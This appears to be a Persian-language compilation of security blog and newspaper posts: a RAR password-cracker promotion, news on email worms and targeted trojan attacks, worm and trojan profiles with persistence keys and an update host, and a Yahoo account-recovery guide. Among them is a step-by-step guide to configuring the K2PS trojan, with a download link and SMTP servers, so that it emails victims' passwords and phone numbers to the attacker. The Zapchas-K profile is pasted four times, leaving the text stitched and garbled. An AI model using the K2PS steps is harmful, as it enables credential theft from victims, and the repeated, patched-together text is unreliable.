از: http://www.softestan.com
اگر پسورد فایلهای Rar خود را فراموش کرده اید نرم افزار RAR Password Cracker آخرین امید شما خواهد بود.
تست های صورت گرفته توسط ما نشان داد این برنامه برای یافتن یک پسورد سه حرفی بیش از یک ساعت به جستجو پرداخت که شاید مدت زمان زیادی باشد اما با توجه به اینکه RAR Password Cracker هنگام اجرا مقدار بسیار جزئی از حافظه کامپیوتر را اشتغال می کند می توانید بدون نگرانی از کاهش سرعت سیستم، آنرا برای مدت زمان طولانی فعال نگاه دارید تا به جستجوی پسورد فایل Rar اقدام کند.
این نرم افزار دارای یک محیط ظاهری کاربرپسند و بسیار راحت است. در هنگام اجرا نرم افزار پیش بینی می کند که چه مدت زمان لازم است تا پسورد فایل Rar شکسته شود. ضمن آنکه همیشه می توانید با کلیک بر روی آیکون کوچک شده ی برنامه، مقدار زمان باقی مانده را مشاهده کنید.
در صورتیکه پس از زمان مشخصی نرم افزار نتوانست پسورد فایل Rar را تشخیص دهد و شما نیازمند خاموش کردن سیستم خود بودید، این برنامه می تواند در راه اندازی بعدی ویندوز مجددآ جستجوی خود را از همان مقدار قبلی ادامه دهد.
آخرین نسخه از این نرم افزار RAR Password Cracker 4.12 می باشد که با استفاده از دو روش به یافتن پسوردها اقدام می کند روش نخست "bruteforce" و روش دوم "dictionary" است. هرچند که فایل های "dictionary" بصورت پیش فرض در برنامه وجود ندارند و شما باید خود آنها را به نرم افزار اضافه کنید.
نرم افزار RAR Password Cracke برنامه ای کارآمد برای تمامی کاربرانی است که روزانه با تعداد زیادی فایل های فشرده Rar سر و کار دارند.
http://www.rarpasswordcracker.com/rpc412_setup.exe
منبع: سافتستان
منبع: روزنامه جامجم
انتشار ویروس اینترنتی با سوء استفاده از اخبار طوفانهای اخیر در کشورهای اروپایی
احتمالاً در طول یک ماه گذشته، اخبار مربوط به طوفانهای شمال و شمالغرب اروپا را در اخبار و روزنامهها مطالعه کردهاید و از خسارات سنگینی که این طوفانها به جا گذاشتهاند با خبرید طوفانهایی که در طول چند سال اخیر در اروپا بیسابقه بودهاند و به جزء خسارات مالی به جای مانده از آنها، خسارات جانی زیادی را به همراه داشت و تعدادی از مردم اروپا را به کام مرگ کشاند. تصور کنید در چنین شرایطی که نیروهای امدادی در اکثر کشورهای اروپایی در شرایط آماده باش بودند و خانوادهها پیگیری آمار مجروحین و آسب دیدهگان خود هستند، برخی افراد سود جو هم از این موقعیت به نفع خود استفاده میکنند. معمولاً در این گونه شرایط، دزدان و سارقان از فرصت استفاده میکنند و به خانههای آسیب دیده دستبرد میزنند، اما افراد سود جوی دیگری هم وجود دارند که در دنیای اینترنت منتظر چنین فرصتهایی هستند. در حالی که اکثر کاربران سعی میکنند از طریق شبکه اینترنت، اخبار مربوط به این حادثه و طوفان عظیم اروپا را پیگیری کنند، هکرهای اینترنتی هم وقت را مقتنم میشمارند و برای حمله به کامپیوتر کاربران کمین میکنند.
طوفان اروپایی
تصور کنید برای کسی که یکی تاز نزدیکان و دوستان او در متن حادثه قرار دارد و هیچ خبری از او ندارد، یک نامه الکترونیکی با عنوان ((لیست کشته شدهگان حادثه طوفانهای اروپا)) و یا ((تصاویر به دست آمده از طوفان اروپا)) ارسال شود، ممکن است بدون درنگ نامه را باز کند و فایل ضمیمه آنرا باز کند.
تنها چند روز پس از انتشار خبر طوفان در کشورهای اروپایی، یک ویروس رایانهای در شبکه اینترنت انتشار یافت که از طریق نامههای الکترونیکی انتقال مییابد این ویروس که روی سرویسهای پست الکترونیکی تأثیر میگذارد به سرعت منشر میشود و تا کنون توانسته رایانههای زیادی را کشورهای اروپایی آلوده کند شرکتهای امنیتی نام این ویروس را با توجه به موضوع انتخابی آن، ویروس ((طوفان اروپایی)) اعلام کردهاند. شرکتهای امنیتی و ضد ویروسی در ساعات ابتدایی انتشار این ویروس حوزه فعالیت این ویروس را کشورهای اروپایی و برخی کشورهای آمریکایی اعلام کردند. اما ظرف کمتر از 24 ساعت از اعلام این خبر، این طوفان اروپایی، به کشورهای آسیایی هم راه یافت و به خصوص در کشورهای آسیای شرقی کامپیوترهای زیادی مورد هدف قرار داد پیشبینی میشود با توجه به سرعت بالای انتشار آن تا چند هفته آینده وارد کشور ما هم بشود البته زیاد نگران این مسئله نباشید، زیرا اکثر نرم افزارهای ضد ویروسی و امنیتی توانستهاند آنرا شناسایی و با آن مقابله کند به همه شما عزیزان توصیه میکنیم، در هنگام مراجعه به صندوق پست الکترونیکی خود، از باز کردن هر گونه نامه مشکوک خودارری کنید و از هم اکنون برای بروز رسانی نرم افزار ضد ویروسی کامپیوتر خود اقدام کنید.
در بیشتر موارد، موضوع نامه الکترونیکی منتقل کننده این ویروس عبارت ((تصاویر 230 نفر از کشته شدگان حادثه طوفان اروپا)) گزارش شده است. همچنین چند نمونه از فایلهای ضمیمه شده به نامه مذکور نیز عبارتند از ((Full Clip.exe)) ، ((Full Story.exe)) ، ((Read More.exe)) و ((Video.exe)) نکته بسیار مهم در مورد این ویروس این است که هنگام کلیک کاربر بر روی نامه الکترونیکی مذکور، ویروس شروع به فعالیت میکند و اجرای آن نیاز به دانلود و اجرای فایل ضمیمه ندارد.
سوء استفاده از کاربران
هدف اصلی از انتشار ویروس ((طوفان اروپایی))، آلوده کردن کامپیوترها و سوء استفاده از آنها برای فعالیتهای مخرب بعدی است این ویروس پس از ورود به سیستم کاربران، اطلاعات شخصی کاربر را به سرقت میبرد و سپس با تئجه به برنامههای مخرب خود، از آن کامپیوتر و صندوق پستی کاربر برای ارسال نامههای پر حجم (هرزنامه) استفاده میکند.
شرکتهای امنیتی برخی از نسخههای این ویروس را جزو نرمافزارهای تروجان بحساب آوردهاند. نرم افزارهای تروجان میتوانند بدون آنکه کاربر از فعالیتهای این نرم افزار مطلع شود از کامپیوتر او سوء استفاده کنند و از آن برای اهداف شوم خود بهره برداری کنند.
کاربران سادهلو
متأسفانه تا کنون در چندین مورد نمونه مشابه این اتفاقات و این حملههای ویروسی را در شبکه اینترنت مشاهده کردهایم. چند سالی است که هکرهای اینترنتی از اخبار مهم و روز دنیا برای مقاصد پلید خود استفاده میکنند و کاربران تازه کار و ناآگاه، به راحتی با این ترفندها فریب میخورند. از نمونه این ویروسها میتواند در زمان زلزله سونامی و به دار آویخته شدن صدام حسین اشاره کرد.
منبع: روزنامه جام جم
ویروس
تاریخ انتشار:2007 January 16
سیستم عاملهای آسیبپذیر، ویندوزهای xp , Server 2003 , NT , Windows Me , Windows 2000 , 95 , 98 این کرم، پس از الوده کردن سیستم عامل قربانی، خود را با نام Logo1.exe در پوشه ویندوز و همچنین با نام pif.exe در مسیر اصلی کلیه درایورهای کامپیوتر ذخیره میکند. این کرم برای مخفی ماندن و جلوگیری از پاکسازی سیستم عامل توسط آنتیویروسها، تمامی Processها را با نامهای زیر میبندد:
FrogAgent.exe Mcshield.exe
Ravmon.exe spoclsv.exe
VsTskmgr.exe naPrdmgr.exe
TrojDie.kxp UpdaterUI.exe
Rundll23.exe TBMon.exe
RavmonD.exe Ravtask.exe
Ravmon.exe
اگر سیستم عامل به نسخههای قدیمی این کرم آلوده باشند، کرم جدید نسخههای قدیمی را پاک میکند و خود را جایگزین آن میکند. این کرم برای انتشار خود از دو روش استفاده میکند.
در روش اول، با استفاده از شبکههای به اشتراک گذاشته شده، خود را به کامپیوترهایی که پسورد سادهای دارند، انتقال میدهند. در روش دوم، جست و جوی فایلهای exe موجود در کامپیوتر قربانی میپردازدسپس تمام آنها را آلوده میکند. اگر هر یک از فایلهای exe از از کامپیوتر آلوده شده به کامپیوتر دیگری انتقال یابد در صورت اجرا شدن فایل exe درون کامپیوتر جدید آن نیز آلوده میشود این کرم برای update کردن خود، اقدام به اتصال به یک وب سایت به آدرس mm.21380.com میکند و از طریق آن نسخههای جدید و به روز شده خود را دریافت میکند.
منبع: روزنامه جامجم
رشد روز افزون حمله اسبهای تروا به شرکتها و سازمانها معتبر
اولین روز ماه دسامبر سال 2005، دو نامه الکترونیکی از رایانهای در کشور استرالیا به دو سازمان مختلف حقوقی فرستاده شد. به هر کدام از این نامهها یک فایل مایکروسافتورد ضمیمه شده بود. اما این فایل یا سایر فایلهای ورد تفاوت داشت. این فایل یک نرمافزار جاسوسی بود که در پشت یک فایل متنی مخفی شده بود. پس از از باز شدن این فایلها، به طرز مرموزی کنترل شبکه داخلی این دو سازمان به دست افراد ناشناختهای افتاد. به طوری که این کروه توانستند به راحتی از خارج از سازمان، به تمام رایانههای متصل به این شبکه و اطلاعات درون آنها تسلط داشته باشند. هر چند که بعد از مدت کوتاهی این سازمانها رایانههای خود را پاکسازی کردند و مانع دسترسی تبهکاران به رایانههای داخلی شدند. اما چند هفته بعد باز هم از طریق دیگری رایانههای این دو سازمان مورد حمله نرمافزارهای تروجان قرار گرفت و صدماتی به سیستمهای داخلی آنها وارد شد.
امروزه در دنیای اینترنت بارها شاهد اینگونه اتفاقات و یا حملات شدیدتر اسبهای تروا، ویروسها و نرمافزارهای جاسوسی اینترنتی هستیم. کمتر پیش میآید که این برنامهها با هدف حمله به یک یا چند رایانه خانگی بکار گرفته شوند. بیشتر برنامههای تروجان، به هدف حمله به سازمانهای دولتی، شرکتهای خصوصی وسازمانهای سیاسی و نظامی مورد استفاده قرار میگیرند.
شیوه نفوذ این نرم افزارها هم همانگونه که عنوان شد، معمولاً از طریق نامههای الکترونیکی است. شرکت امنیتی Messagelabs که در ضمینه سیستمهای امنیتی صندوقهای پستی فعالیت میکند در گزارشی اعلام کرده است که پول یک سال، یعنی از ماه می 2005 تا می 2006، بیش از 500 مورد حمله به شبکههای اینترنتی و اینترانتی گزارش شده که حدود 300 مورد از این حملات از طریق نامههای الکترونیکی انجام گرفته است.
امروزه حملات از پیش تعیین شده اسبهای تروا، به مهمترین دغدغه شرکتهای تولید کننده نرمافزارهای ضد ویروسی و به طور کلی صنعت امنیت رایانه تبدیل شده است خطرات ناشی از این حملات و افزایش روز افزون آنها را سال گذشته، گروههای پاسخگویی به حوادث غیر منتظره رایانهای در انگلستان، کانادا و استرالیا هشدار داده بودند.
تروجانهای ضعیف
مسئله اصلی که بیشتر باعث اعتراض شرکتهای بزرگ، ادارات دولتی و دیگر سازمانهای معتبر میشود این است که نرمافزارهای ضد ویروسی در جلوگیری از حملات کوچک و ضعیف چندان خوب عمل نمیکنند برنامههای ضد ویروسی متداول معمولاً ویروسیها و برنامههایی را شناسایی میکنند که در چندین شبکه و یا سازمان اجرا شدهاند و توسط شرکت ضد ویروسی پشتیبان آن شناسایی شده است. گاهی پیش میآید که یک ویروس یا کرم ساده به یک شبکه محلی وارد میشود ولی نرمافزار امنیتی موجود قادر به شناسایی و یا از بین بردن آن نیست. در این مواقع مسئولین و مدیران شبکهها برای از بین بردن این برنامهها، شرکتهای پشتیبان را باخبر میکنند و در نهایت زمانی سیستم را از وجود آنها پاک میکنند که ممکن است کار از کار گذشته باشد و هکرها به اطلاعات مورد نظرشان دست پیدا کرده باشند.
معمولاً چنانچه شبکهای نتواند اولین حمله را به موقع دفع کند، صدمات مالی زیادی خواهد دید به عنوان مثال چند ماه قبل، یک شرکت داروسازی معتبر دراسترالیا مورد حمله یک تروجان قرار گرفت و قبل از آنکه سیستم امنیت این شرکت بتواند اقدام لازم را انجام دهد، از طریق یک برنامه جانبی که به همراه این تروجان وارد شبکه داخلی آن شده بود، تمامی اطلاعات این شرکت روزگزاری شد و مانع دسترسی کاربران این شرکت به اطلاعات موجود روی سرور شد چند روز بعد از این اتفاق، عوامل این نرم افزار از شرکت مذکور مبلغی سی میلیون دولار را درخواست کردند این شرکت هم برای راهاندازی مجدد سیستم رایانهای خود مجبور به پرداخت آن شد و پس از آن هم حدود یک ماه طول کشید تا سیستمهای دفتر مرکزی این شرکت و سیستمهای سه دفتر نمایندگی در کشورهای دیگر از تروجان مورد نظر پاکسازی شوند.
نکته جالب در مورد این تروجان این است که برنامهای بسیار ساده و پیش پا افتاده داشته و هیچکدام از نرمافزارهای امنیتی این شرکت داروسازی آنرا شناسایی نکردند همچنین این برنامه از طریق یک نامه الکترونیکی وارد سیستم شرکت شده بود که متن آن نامه حاوی درخواست یک شرکت خیالی برای خرید و سفارش دارو بوده است بدن ترتیب مشخص شد، این تروجان با یک هدف از پیش برنامهریزی شده وارد این شبکه شده بود.
منبع: Securityfocus.com
منبع: http://irtnt.persianblog.com
این تروجان تمام پسورد ها و شماره تلفن های وارد شده در سیستم قربانی را برای شما میل می کند !
طرز کار آن هم خیلی ساده است .
اول برنامه را از لینک http://www.sharemation.com/tnt7/booters/K2PS034.zip دانلود کنید و از حالت زیپ خارجش کنید فایل K2pS_setup را اجرا کنید .دکمه open را بزنید .
حال یکی از فایلهای کناری این برنامه را انتخاب کنید و open را بزنید ... فایل اولی که K2pS است تمام یوزر پسورد ها و شماره ها را برای شما هر زمان که قربانی به اینترنت وصل شود برای شما فرستاده می شود و دومی که K2pS_full است همان کار را می کند با این تفاوت که دیگر پسورد های تکراری را برای شما نمی فرستد !
حالا بعد از انتخاب سرور .. در قسمت smtp srver : باید آدرس سرور میل را وارد کنید (که چندتا میل سرور را برای شما اخر می نویسم)
و در قسمت destination adress ایمیلی که باید اطلا عات به آن فرستاده شود (ایمیل خود شما)
در قسمت source address هم اسم قربانی یا هر چی که دوست دارید وارد کنید و بعد دکمه save را بزنید .. سرور شما آماده است توجه کنید که فایلی را ایجاد نمی کند در واقع فایل سروری که انتخاب کردید را ویرایش می کند .. پس فایل سرور همان فایلی است که open کردید ... .
ادرس سرورها : noavar.com
mail.noavar.com
yahoo.com
mx1.mail.yahoo.com mx2.mail.yahoo.com mx4.mail.yahoo.com
منبع: http://rightclick.ir
در این قسمت سعی دارم روش پس گرفتن ایمیلمون رو از هکر توضیح بدهم .
این توضیحات هر شامل 10 عکس است که به علت محدودیت فقط لینک اون ها رو می گزارم ...
کلا سایت های ارایه دهنده ایمیل موقع ثبت نام معمولا یه سوال امنیتی می پرسند (برای این که اگه پسوردتون یادتون رفت بتونید اون رو برگردونید) مثلا نام حیوان دست آموزتان یا نام اولین مدرسه ای که رفتید یا ...همچنین بعضی از اونا تاریخ تولد و چیزای دیگه ای هم می پرسند ...
که شما با دونستن اون ها می تونید به راحتی پسورد خود را عوض کنید ...
برای این منظور من آموزش این کار رو توی سرویس ایمیل یاهو توضیح می دم :
اول از همه بایستی موقع ثبت نام این مشخصات رو که بهتون می ده رو بدونید یا یه پرینت ازش بگیرید :
لینک عکس : http://www.cjb.cc/members/mojtaba/images/webloghack/001.gif
خوب برای باز یابی پسورد یا پس گرفتن ایمیلمون از هکر مراحل زیر را طی می کنیم:
(توجه : این مراحل برای سرویس ایمیل یاهو نوشته شده اند ولی بقیه ارایه دهندگان سرویس ایمیل هم چیزی شبیه به این دارند).
* ابتدا به قسمت ورود می رویم :
لینک عکس : http://www.cjb.cc/members/mojtaba/images/webloghack/002.gif
و بعد بر روی لینک Forget your Password کلیک می کنیم . وارد قسمت بعد می شویم :
لینک عکس : http://www.cjb.cc/members/mojtaba/images/webloghack/003.gif
این فرم را مطابق شکل زیر پر می کنیم :
لینک عکس : http://www.cjb.cc/members/mojtaba/images/webloghack/004.gif
در این قسمت برای دریافت پسورد جدید در قسمت پایین صفحه می توانید ID خود و یا ایمیل دیگر خود (در موقع ثبت نام یک ایمیل دیگر غیر از یاهو را به صورت اختیاری می توانید وارد کنید که اینجا به دردتون می خوره) را وارد می کنیم.ما فرض می کنیم که ایمیل دیگر هم نداشته باشیم . پس با وارد کر دن ID ور کلیک بر روی دکمه Get New Password به قسمت بعد می رویم :
لینک عکس : http://www.cjb.cc/members/mojtaba/images/webloghack/005.gif
در این قسمت سوال امنیتی که موقع ثبت نام وارد کرده ایم را از ما می پرسد . پس از درست جواب دادن به این سوال دیگر کار تمام است و پسورد جدید را به ما می دهد :
لینک عکس : http://www.cjb.cc/members/mojtaba/images/webloghack/006.gif
خوب حالا کافی است که برروی لینک مشخص شده کلیک کنیم و با پسورد جدیدی که خود یاهو به ما داده است وارد ایمیل خود شویم:
لینک عکس : http://www.cjb.cc/members/mojtaba/images/webloghack/007.gif
خوب پس از وارد شدن صفحه زیر نمایش داده می شود و از شما تقاضا می کند که پسورد خود را عوض کنید :
لینک عکس : http://www.cjb.cc/members/mojtaba/images/webloghack/008.gif
پس از تعویض پسورد تان به شما پیام موفقیت را نمایش می دهد :
لینک عکس : http://www.cjb.cc/members/mojtaba/images/webloghack/009.gif
بعد از این دیگر این ایمیل در اختیار شما است :
لینک عکس : http://www.cjb.cc/members/mojtaba/images/webloghack/010.gif
نویسنده :: آرش حسینیان
نام :: نام Troj/Zapchas-K
نوع :: تروجان
شدت پخش :: 1
سیستم عامل هدف :: ویندوز
طریقه پخش :: برنامه های گفتمان
نام مستعار :: Backdoor.Win32.mIRC-based و IRC/Flood.mirc
وظایف ::
1 - دسترسی دیگران به منابع سیستم
2 - دزدین اطلاعات
3 - اجرای ویروس های دیگر
4 - دانلود کد های خود از اینترنت
تشریح ::
این تروجان که روی سیستم عامل های ویندوز فعالیت می کند سعی می کند از طریق کانال های IRC برای هکر بر روی سیستم عامل هدف دسترسی ایجاد کند . همچنین سعی می کند از همین کانال ها از طریق DCC به نام فایل postcard.gif.exe پخش شود .
در پشتی این تروجان قابلیت دزدین اطلاعات و دانلود و اپلود فایل و اجرای برنامه ها را به ویروس نویس می دهد .این تروجام هنگامی که برای اولین بار اجرا می شود خود را با نام فایل های زیر در شاخه System کپی می کند :
svchost.exe
script.ini
همچنین این تروجان فایل های زیر را بر روی سیستم هدف می سازد ::
mirc.ini
msg.txt
nicks.txt
pri.txt
remote.ini
serv.txt
servers.ini
sup.bat
sup.reg
username.txt
و همچنین این شاخه ها را در رجیستری ویندوز درست می کند :
HKLM\SOFTWARE\CLASSES\irc\Shell\open\command
@
"C:\Windows\System\svchost.exe" -noconnect
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
GNP Generic Host Process
"C:\Windows\system\svchost.exe
نویسنده :: آرش حسینیان
نام :: نام Troj/Zapchas-K
نوع :: تروجان
شدت پخش :: 1
سیستم عامل هدف :: ویندوز
طریقه پخش :: برنامه های گفتمان
نام مستعار :: Backdoor.Win32.mIRC-based و IRC/Flood.mirc
وظایف ::
1 - دسترسی دیگران به منابع سیستم
2 - دزدین اطلاعات
3 - اجرای ویروس های دیگر
4 - دانلود کد های خود از اینترنت
تشریح ::
این تروجان که روی سیستم عامل های ویندوز فعالیت می کند سعی می کند از طریق کانال های IRC برای هکر بر روی سیستم عامل هدف دسترسی ایجاد کند . همچنین سعی می کند از همین کانال ها از طریق DCC به نام فایل postcard.gif.exe پخش شود .
در پشتی این تروجان قابلیت دزدین اطلاعات و دانلود و اپلود فایل و اجرای برنامه ها را به ویروس نویس می دهد .این تروجام هنگامی که برای اولین بار اجرا می شود خود را با نام فایل های زیر در شاخه System کپی می کند :
svchost.exe
script.ini
همچنین این تروجان فایل های زیر را بر روی سیستم هدف می سازد ::
mirc.ini
msg.txt
nicks.txt
pri.txt
remote.ini
serv.txt
servers.ini
sup.bat
sup.reg
username.txt
و همچنین این شاخه ها را در رجیستری ویندوز درست می کند :
HKLM\SOFTWARE\CLASSES\irc\Shell\open\command
@
"C:\Windows\System\svchost.exe" -noconnect
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
GNP Generic Host Process
"C:\Windows\system\svchost.exe
نوع :: تروجان
شدت پخش :: 1
سیستم عامل هدف :: ویندوز
طریقه پخش :: برنامه های گفتمان
نام مستعار :: Backdoor.Win32.mIRC-based و IRC/Flood.mirc
وظایف ::
1 - دسترسی دیگران به منابع سیستم
2 - دزدین اطلاعات
3 - اجرای ویروس های دیگر
4 - دانلود کد های خود از اینترنت
تشریح ::
این تروجان که روی سیستم عامل های ویندوز فعالیت می کند سعی می کند از طریق کانال های IRC برای هکر بر روی سیستم عامل هدف دسترسی ایجاد کند . همچنین سعی می کند از همین کانال ها از طریق DCC به نام فایل postcard.gif.exe پخش شود .
در پشتی این تروجان قابلیت دزدین اطلاعات و دانلود و اپلود فایل و اجرای برنامه ها را به ویروس نویس می دهد .این تروجام هنگامی که برای اولین بار اجرا می شود خود را با نام فایل های زیر در شاخه System کپی می کند :
svchost.exe
script.ini
همچنین این تروجان فایل های زیر را بر روی سیستم هدف می سازد ::
mirc.ini
msg.txt
nicks.txt
pri.txt
remote.ini
serv.txt
servers.ini
sup.bat
sup.reg
username.txt
و همچنین این شاخه ها را در رجیستری ویندوز درست می کند :
HKLM\SOFTWARE\CLASSES\irc\Shell\open\command
@
"C:\Windows\System\svchost.exe" -noconnect
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
GNP Generic Host Process
"C:\Windows\system\svchost.exe
نویسنده :: آرش حسینیان
نوع :: تروجان
شدت پخش :: 1
سیستم عامل هدف :: ویندوز
طریقه پخش :: برنامه های گفتمان
نام مستعار :: Backdoor.Win32.mIRC-based و IRC/Flood.mirc
وظایف ::
1 - دسترسی دیگران به منابع سیستم
2 - دزدین اطلاعات
3 - اجرای ویروس های دیگر
4 - دانلود کد های خود از اینترنت
تشریح ::
این تروجان که روی سیستم عامل های ویندوز فعالیت می کند سعی می کند از طریق کانال های IRC برای هکر بر روی سیستم عامل هدف دسترسی ایجاد کند . همچنین سعی می کند از همین کانال ها از طریق DCC به نام فایل postcard.gif.exe پخش شود .
در پشتی این تروجان قابلیت دزدین اطلاعات و دانلود و اپلود فایل و اجرای برنامه ها را به ویروس نویس می دهد .این تروجام هنگامی که برای اولین بار اجرا می شود خود را با نام فایل های زیر در شاخه System کپی می کند :
svchost.exe
script.ini
همچنین این تروجان فایل های زیر را بر روی سیستم هدف می سازد ::
mirc.ini
msg.txt
nicks.txt
pri.txt
remote.ini
serv.txt
servers.ini
sup.bat
sup.reg
username.txt
و همچنین این شاخه ها را در رجیستری ویندوز درست می کند :
HKLM\SOFTWARE\CLASSES\irc\Shell\open\command
@
"C:\Windows\System\svchost.exe" -noconnect
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
GNP Generic Host Process
"C:\Windows\system\svchost.exe
اساسا” تمامی این موارد تحت گروه کلی ویروس ها قرار می گیرند. با این حال تفاوت های کمی هم بین این سه مورد وجود دارد. ویروس – یک ویروس از لحاظ فنی(با چسبیدن یا وارد شدن به فایل ) فایل دیگری را آلوده می کند. آنها معمولا” فایل های برنامه یا مدارک Ms office را آلوده می کنند. از این طریق آنها تکثیر می شوند و خسارت وارد می کنند. ویروس ها بر خلاف کرم ها به تنهایی عمل نمی کنند. کرم- کرم ها تقریبا” با « ویروس واقعی »یکی هستند. به جز اینکه کرم ها می توانند به تنهایی به فعالیت خود ادامه دهند و به طور کلی سایر فایل ها را نیز آلوده نمی کنند (ولی جایگزین فایل می شوند). کرم ها معمولا” با استفاده از ایمیل، شبکه،دیسک یا .... خود را کپی می کنند. بازیگر باید گفت که کرم ها خیلی شبیه ویروس ها هستند و خسارت های مشابهی را نیز به وجود می آورند. اسب های تروا- این برنامه خودش را تکثیر نمی کند اما به کامپیوتر بر آسیب می رساند. در این برنامه کاربران هستند که باعث انتشار و اجرای اسب های تروا می شوند. اسب های تروا خود را ایمیل نمی کنند. اسب های تروا شبیه یک برنامه بی ضرر چون محافظ صفحه نمایش یا لطیفه هستند و به این طریق منتشر می شوند.